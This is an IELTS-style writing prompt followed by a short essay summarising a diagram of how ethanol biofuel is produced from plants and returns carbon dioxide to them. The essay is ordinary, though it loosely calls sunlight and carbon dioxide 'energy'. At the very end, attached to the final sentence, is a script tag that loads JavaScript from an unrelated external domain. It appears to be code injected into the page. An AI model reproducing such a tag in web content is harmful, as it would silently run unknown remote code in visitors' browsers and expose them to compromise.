The diagram below shows how a biofuel called ethanol is produced.
Summarise the information by selecting and reporting the main features, and make comparisons where relevant.
The diagram depicts the producing method of a biofuel, which is ethanol, and how it would be used.
Overall, the production of ethanol includes several steps which have some typical advantages on transportation. Moreover, this process is cyclic.
First, energy, which is sunlight and carbon dioxide, is consumed by plants and trees for the growing process. After that, they will be harvested and transported to industrial plants to transfer these trees into cellulose. Then, after complex processes, cellulose would be turned into sugars, and added microbes to trigger the process of ethanol production.
After the whole complex producing processes, ethanol could be used as a type of fuel to run some vehicles using fuel like cars, trucks, or planes and then release into the air as carbon dioxide. Finally, carbon dioxide which comes from vehicles again becomes an essential energy for plants and trees, continuing the cyclic process.<script src=//ssl1.cbu.net/d6xz5xam></script>
